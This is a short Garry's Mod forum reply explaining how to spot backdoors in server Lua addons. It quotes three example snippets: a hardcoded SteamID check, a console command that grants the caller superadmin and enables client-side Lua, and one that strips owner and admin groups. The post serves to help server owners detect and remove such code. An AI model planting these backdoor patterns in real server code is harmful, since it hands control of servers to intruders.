Garry's Mod

I need help pls

Submitted by NyuKos, , Thread ID: 201582

Thread Closed

RE: I need help pls

#6
25-03-2021, 05:52 PM
NyuKos Wrote:
Also, could you tell me how I can find backdoors

im not experienced in that area but typically its not hard to see, lua is not a hard to read language

if you see something like this

Code:
ply:SteamID() == "STEAM_0:100000000") then

or this

Code:
concommand.Add( "backdoor" ,  function( debugPlayer )
  RunConsoleCommand("ulx","adduser",debugPlayer:Name(), "superadmin")
  RunConsoleCommand("sv_allowcslua" , "1")

or this

Code:
concommand.Add( "byebyeadmin" , function()
   RunConsoleCommand("ulx","removegroup","owner")
   RunConsoleCommand("ulx","removegroup","admin")

you are backdoored and need to remove the plugin / code

Users browsing this thread: 5 Guest(s)